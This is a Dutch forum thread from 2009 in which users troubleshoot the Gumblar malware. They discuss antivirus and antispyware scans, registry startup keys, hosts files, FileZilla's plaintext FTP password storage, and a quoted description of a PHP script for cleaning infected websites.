    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71792646
    quote:
    Op dinsdag 11 augustus 2009 15:24 schreef Qwea het volgende:

    [..]

    Nou ja, tijd aan uitzoeken? Weet je hoe omslachtig formatten is? Je kan alle partities gaan formatten. Dus je moet een back up maken, windows opnieuw installen, ect

    Je laat het een beetje klinken alsof formatten binnen een half u gepiept is wast maar zo simpel
    Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.

    Kwestie belangrijk spul even doorscannen en dan verplaatsen naar USB stick. Vervolgens alleen die ene schijf formatteren...
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:10:56 #169
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792677
    quote:
    Op dinsdag 11 augustus 2009 16:09 schreef Mr.Noodle het volgende:

    [..]

    Als je meerdere partities hebt is het alleen maar makkelijker. Je kan de virusscanner en malwarescanner er op los laten. Maar daar zul je weinig kwaadaardigs vinden. Zeker omdat er op andere partities niet het besturingssysteem staat. Enige wat geinfecteerd wordt is de partitie met Windows erop. Daar staat het register in en daar worden alle taken van programma's uitgevoerd.


    Dan kan ik dus gewoon als al dit niet helpt straks f4 doen en alles terug zetten woei
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:11:47 #170
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792703
    Adaware vondt enkel koekjes
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      FOK!-Schrikkelbaas dinsdag 11 augustus 2009 @ 16:12:09 #171
    1972 Swetsenegger
    Egocentrische Narcist
    pi_71792711
    quote:
    Op dinsdag 11 augustus 2009 16:08 schreef MissBliss het volgende:

    [..]

    Ik snap niet wat je precies typt, maar ik gebruik dus ook filezilla en het ergerde me juist zo dat ie mn inloggegevens nooit onthield Maar dat doet ie dus kennelijk wél
    vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.

    tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet.
      dinsdag 11 augustus 2009 @ 16:12:35 #172
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792722
    edit.

    Nutteloos logje, aangezien het de smart scan was.

    Wel de full doen, Q
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71792756
    quote:
    Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
    Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
    Gumblar is toch (ook) een packet sniffer, die je passwords jat als je inlogt, en ze dus niet uitleest uit een bestand?
      dinsdag 11 augustus 2009 @ 16:14:37 #174
    111829 MissBliss
    Godin van SHO
    pi_71792779
    quote:
    Op dinsdag 11 augustus 2009 @ 16:12 schreef Swetsenegger het volgende:

    [..]

    vroegah sloeg filezilla je ftp gegevens gecodeerd op in een bestandje. Als je dat bestandje opende stond je wachtwoord 'ikke' bv als Gj6%4juy erin. Kortom, gecodeerd. Als gumbar probeert in te loggen met Gj6%4juy komt ie niet op je website.

    tegenwoordig zet Filezilla gewoon 'ikke' in een bestandje. platte tekst dus. Niet gecodeerd. En zo komt gumbar aan passwords. Wat andere ftp clients doen weet ik niet.
    Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 16:15:19 #175
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792802
    quote:
    Op dinsdag 11 augustus 2009 16:14 schreef MissBliss het volgende:

    [..]

    Ok. Kan je daar nog iets aan doen? Of is dat gewoon een minpunt van Filezilla?
    Andere ftp prog nemen?

    Heeft jouw malware dinges al wat gevonden?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:16:53 #176
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71792842
    quote:
    Op dinsdag 11 augustus 2009 16:05 schreef Swetsenegger het volgende:
    Het ontging me even hoe gumblar aan ftp gegevens kwam, maar ik zie nu dat bv filezilla sinds versie 3 de passes in plaintext in een xml tieft
    Geniaal!!
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:17:00 #177
    111829 MissBliss
    Godin van SHO
    pi_71792849
    quote:
    Op dinsdag 11 augustus 2009 @ 16:15 schreef Qwea het volgende:

    [..]

    Andere ftp prog nemen?

    Heeft jouw malware dinges al wat gevonden?
    Ik heb zo lang gezocht naar een handig ftp-prog

    Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden Daarna doe ik mailwaren-dinges wel weer.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 16:19:44 #178
    79166 Qwea
    #teampindakaas #viesdik
    pi_71792939
    quote:
    Op dinsdag 11 augustus 2009 16:17 schreef MissBliss het volgende:

    [..]

    Ik heb zo lang gezocht naar een handig ftp-prog

    Nee, ik heb even tussendoor een ander programma laten draaien, superantispyware, die heeft inmiddels al 96 threats gevonden Daarna doe ik mailwaren-dinges wel weer.
    Ik draai malware, en adaware En ik zat in mn register te zoeken naar die gumbar key, maar die is er gelukkig niet
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:19:48 #179
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71792944
    SuperAntiSpyWare is ook goed, samen met Malwarebytes een van de betere op dit moment..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:21:08 #180
    111829 MissBliss
    Godin van SHO
    pi_71792984
    Dingen als in de register kijken heb ik niet echt verstand van Dus ik wacht eerst dit maar even af.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 16:22:41 #181
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793023
    MM kwam met het briljante idee om FF af te sluiten en dan de files zoals die C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\formhistory dinges

    te verwijderen.

    nou, dat deed ie dus wel. FF bleek na het gewoon afsluiten nog actief dus process gekilled. Ben nieuwd wat er nu verder aangegeven wordt. Ik zal die superantispyware er ook maar bij runnen
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:24:23 #182
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793066
    zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\

    ga is formhistory.sqlite er weer !
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:30:05 #183
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71793220
    Wat zei ik nou net over aVast...
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:34:43 #184
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793352
    quote:
    Op dinsdag 11 augustus 2009 16:30 schreef Mr.Noodle het volgende:
    Wat zei ik nou net over aVast...
    Nou, ja, ehm



    Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen das krom

    malware bytes is wel een poosje bezig zeg al 50 min
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71793374
    quote:
    Op dinsdag 11 augustus 2009 16:24 schreef Qwea het volgende:
    zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\

    ga is formhistory.sqlite er weer !
    formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.
      dinsdag 11 augustus 2009 @ 16:36:18 #186
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793398
    quote:
    Op dinsdag 11 augustus 2009 16:35 schreef CasB het volgende:

    [..]

    formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.
    aaah

    nou ja, de oude is iig weg
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:38:36 #187
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71793461
    quote:
    Op dinsdag 11 augustus 2009 16:34 schreef Qwea het volgende:

    [..]

    Nou, ja, ehm



    Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen das krom

    malware bytes is wel een poosje bezig zeg al 50 min
    Nou ja, aVast detecteert het probleem, dat is iig wat meer dan andere virusscanners doen..
    Ja, full scan duurt een tijdje...
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:38:48 #188
    262 Re
    Kiss & Swallow
    pi_71793470
    quote:
    Op dinsdag 11 augustus 2009 16:30 schreef Mr.Noodle het volgende:
    Wat zei ik nou net over aVast...
    ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 16:38:55 #189
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793473


    ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:39:21 #190
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793478
    quote:
    Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:

    [..]

    ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
    avast ziet hem hier niet eens
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:39:22 #191
    262 Re
    Kiss & Swallow
    pi_71793480
    bij IT zijn ze trouwens ook nog bezig op mijn laptop
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 16:40:03 #192
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793506
    quote:
    Op dinsdag 11 augustus 2009 16:39 schreef Re het volgende:
    bij IT zijn ze trouwens ook nog bezig op mijn laptop
    Ik vind dat ze de kutklerelijers van zo'n virus voor een trein moeten duwen klootzakken
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:40:23 #193
    262 Re
    Kiss & Swallow
    pi_71793516
    quote:
    Op dinsdag 11 augustus 2009 16:38 schreef Qwea het volgende:


    ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat
    ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt
    04-08-11, 02-02-12, 20-06-14, 13-08-15
      dinsdag 11 augustus 2009 @ 16:42:14 #194
    111829 MissBliss
    Godin van SHO
    pi_71793560
    quote:
    Op dinsdag 11 augustus 2009 @ 16:30 schreef Mr.Noodle het volgende:
    Wat zei ik nou net over aVast...
    Heb ik iets gemist? Is avast niet goed?

    Anyway: superantispyware heeft alleen cookies gevonden.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 16:43:49 #195
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793608
    quote:
    Op dinsdag 11 augustus 2009 16:40 schreef Re het volgende:

    [..]

    ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt
    Ja... alleen ik maar hopen dat ik toch geen gumblar had
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 16:47:05 #196
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793681
    eeeeeeeeeeeeeeeeehm?
    quote:
    Malwarebytes' Anti-Malware 1.40
    Database versie: 2601
    Windows 6.0.6001 Service Pack 1

    11-8-2009 16:46:32
    mbam-log-2009-08-11 (16-46-32).txt

    Scan type: Volledige Scan (C:\|D:\|)
    Objecten gescand: 181146
    Verstreken tijd: 1 hour(s), 0 minute(s), 42 second(s)

    Geheugenprocessen geïnfecteerd: 0
    Geheugenmodulen geïnfecteerd: 0
    Registersleutels geïnfecteerd: 0
    Registerwaarden geïnfecteerd: 0
    Registerdata bestanden geïnfecteerd: 0
    Mappen geïnfecteerd: 0
    Bestanden geïnfecteerd: 0

    Geheugenprocessen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Geheugenmodulen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registersleutels geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registerwaarden geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Registerdata bestanden geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Mappen geïnfecteerd:
    (Geen kwaadaardige items gevonden)

    Bestanden geïnfecteerd:
    (Geen kwaadaardige items gevonden)
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 16:53:39 #197
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71793841
    quote:
    Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:

    [..]

    ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie
    Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.

    Tevens staan er ook vaak rare opstartverwijzingen in MSconfig bij het tabblad Services en Startup. Dus alle verdachten verwijzingen daar ook verwijderen cq. uitvinken.

    Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..

    Anyways dit was een aardig tijdrovend karwei en achteraf had ik me bedacht dat formatteren een iets snellere oplossing zou zijn.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 16:57:57 #198
    79166 Qwea
    #teampindakaas #viesdik
    pi_71793949
    quote:
    Op dinsdag 11 augustus 2009 16:53 schreef Mr.Noodle het volgende:

    [..]

    Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.

    Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..
    Ik heb geboot, en draai opnieuw malwarebytes. Alstie namelijk na een boot terug komt, moet ik er nu ook weer zijn.

    Ik ga eens even in het register loeren
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
    pi_71794043
    Hier dus ook zelfde probleem. Zit ook bij pc extreme. Ik had ook een trojan op mijn pc zitten, maar nu is pc helemaal schoon. Het virus staat dan ook niet lokaal, maar komt alleen van de server vandaan> Dizer helpt ook mij door het probleem heen.

    (En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen
      Redactie Games dinsdag 11 augustus 2009 @ 17:05:18 #200
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794161
    Overigens gefeliciteerd met dit topic, je staat nu in de top 10 Google searches voor Gumblar virus

    Verder hier nog een handige link voor mensen die willen controleren of hun website geïnfecteerd is door dat Gumblar. http://unmaskparasites.com/
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:07:44 #201
    111829 MissBliss
    Godin van SHO
    pi_71794224
    quote:
    Op dinsdag 11 augustus 2009 @ 17:01 schreef An24 het volgende:
    Hier dus ook zelfde probleem. Zit ook bij pc extreme. Ik had ook een trojan op mijn pc zitten, maar nu is pc helemaal schoon. Het virus staat dan ook niet lokaal, maar komt alleen van de server vandaan> Dizer helpt ook mij door het probleem heen.

    (En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen
    Ik begin ook te denken dat het virus niet (meer) op deze pc staat.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 17:08:35 #202
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794245
    hij lijkt niet in mn register voor te komen, ook ;



    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:16:05 #203
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794410
    Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van al je eigen gemaakte websites gehaald worden.
    quote:
    How to remove the infection from a website

    If you manage websites using an FTP program, there is a chance that your sites have become infected. The first thing you must do is change the ftp passwords after your machine has been cleaned.

    As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.

    I started off using the script by rad-one at http://blog.unmaskparasit(...)page-1/#comment-896.

    I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.

    Here is what my script does:

    1. Recurses through the whole website, excluding files and/or directories of your choosing.
    2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
    3. All modified files are backed up using the .bak extension.
    4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
    5. Runs in report mode by default, so you can see which files would be modified.
    6. Has a “verbose” option, so you can see how each file will be modified.

    It does not change directory permissions. I haven’t got around to investigating that area yet.

    You may download it here. (Use at your own risk.)
    Instructions for use

    1. Place the file scan_files.php at your web document root.
    2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
    3. Use scan_files.php?v=1 to run it in verbose mode.
    4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
    5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.
    Bron


    [ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 17:22:12 ]
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:20:59 #204
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794510
    quote:
    Op dinsdag 11 augustus 2009 17:16 schreef Mr.Noodle het volgende:
    Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van alle websites gehaald worden.
    [..]
    ik draai geen ftp prog hier dus mijn computer kan niks hebben besmet.

    Vraag me alleen af of hij ECHT weg is
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:21:14 #205
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794519
    quote:
    Op dinsdag 11 augustus 2009 17:08 schreef Qwea het volgende:
    hij lijkt niet in mn register voor te komen, ook ;

    [ afbeelding ]

    [ afbeelding ]
    Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.

    Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:22:37 #206
    111829 MissBliss
    Godin van SHO
    pi_71794547
    Is er een makkelijke manier om in dat register te kijken dan?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 17:23:38 #207
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794570
    quote:
    Op dinsdag 11 augustus 2009 17:22 schreef MissBliss het volgende:
    Is er een makkelijke manier om in dat register te kijken dan?
    Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:25:42 #208
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794612
    quote:
    Op dinsdag 11 augustus 2009 17:21 schreef Mr.Noodle het volgende:

    [..]

    Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.

    Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..
    voor die referenties.. moet ik dan alles handmatig nalopen?



    ik kan in services geen gumblar vinden
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 17:27:10 #209
    111829 MissBliss
    Godin van SHO
    pi_71794640
    quote:
    Op dinsdag 11 augustus 2009 @ 17:23 schreef Mr.Noodle het volgende:

    [..]

    Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?
    Die is nog bezig

    Maar hoe weet ik nou ooit of het echt weg is?
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 17:28:21 #210
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794666
    quote:
    Op dinsdag 11 augustus 2009 17:25 schreef Qwea het volgende:

    [..]

    voor die referenties.. moet ik dan alles handmatig nalopen?

    [ afbeelding ]

    ik kan in services geen gumblar vinden
    Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..

    Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      Redactie Games dinsdag 11 augustus 2009 @ 17:28:57 #211
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794682
    quote:
    Op dinsdag 11 augustus 2009 17:27 schreef MissBliss het volgende:

    [..]

    Maar hoe weet ik nou ooit of het echt weg is?
    Bij een format, weet je zeker dat het echt weg is..
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:31:33 #212
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794737
    quote:
    Op dinsdag 11 augustus 2009 17:28 schreef Mr.Noodle het volgende:

    [..]

    Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..

    Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..
    Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:32:35 #213
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794760
    quote:
    Op dinsdag 11 augustus 2009 17:31 schreef Qwea het volgende:

    [..]

    Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?
    Current user en Local Machine
    en check je hosts-file en je lmhosts.sam

    [ Bericht 2% gewijzigd door Mr.Noodle op 11-08-2009 17:41:04 ]
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:33:26 #214
    111829 MissBliss
    Godin van SHO
    pi_71794784
    quote:
    Op dinsdag 11 augustus 2009 @ 17:28 schreef Mr.Noodle het volgende:

    [..]

    Bij een format, weet je zeker dat het echt weg is..
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      Redactie Games dinsdag 11 augustus 2009 @ 17:37:00 #215
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71794866
    quote:
    Op dinsdag 11 augustus 2009 17:33 schreef MissBliss het volgende:

    [..]

    [ afbeelding ]
    Sorry, maar dit is echt eerlijk geantwoord. Ik weet ook niet alles, virussen van tegenwoordig volgen geen vast patroon meer, als in niet altijd dezelfde bestandsnamen, andere verwijzingen, verschillende locaties en programma's die ze infecteren. Ligt maar net aan wat er allemaal op de PC aan software staat. Ik kan er niet op kijken..

    Format is tenminste wel alles schoon...
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      dinsdag 11 augustus 2009 @ 17:38:46 #216
    111829 MissBliss
    Godin van SHO
    pi_71794899
    Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo.
    Ziggy played guitar
    Op donderdag 23 maart 2006 18:21 schreef Zhenar het volgende:
    De gedachte alleen al om in de sig van MissBliss te staan maakt mij bronstig als een everzwijn bij volle maan :9~
      dinsdag 11 augustus 2009 @ 17:40:34 #217
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794941
    quote:
    Op dinsdag 11 augustus 2009 17:32 schreef Mr.Noodle het volgende:

    [..]

    Current user en Local Machine
    en check je hosts-file en je hosts.sam
    en die host files staan daar ook?
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      dinsdag 11 augustus 2009 @ 17:42:18 #218
    79166 Qwea
    #teampindakaas #viesdik
    pi_71794970
    geen gumblar in mijn register met crtl +f

    superantispyware vindt 4 cookies
    -||||-----||||- Iron and me, we're meant to be -||||-----||||-
      Redactie Games dinsdag 11 augustus 2009 @ 17:44:43 #219
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71795016
    quote:
    Op dinsdag 11 augustus 2009 17:40 schreef Qwea het volgende:

    [..]

    en die host files staan daar ook?
    Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.

    Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.
    How do you get precisely 4 Gallons of water with a 3 Gallon and 5 Gallon Can...
      Redactie Games dinsdag 11 augustus 2009 @ 17:46:20 #220
    52557 crew  Mr.Noodle
    Offtopic in geleuter...
    pi_71795041
    quote:
    Op dinsdag 11 augustus 2009 17:38 schreef MissBliss het volgende:
    Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo.
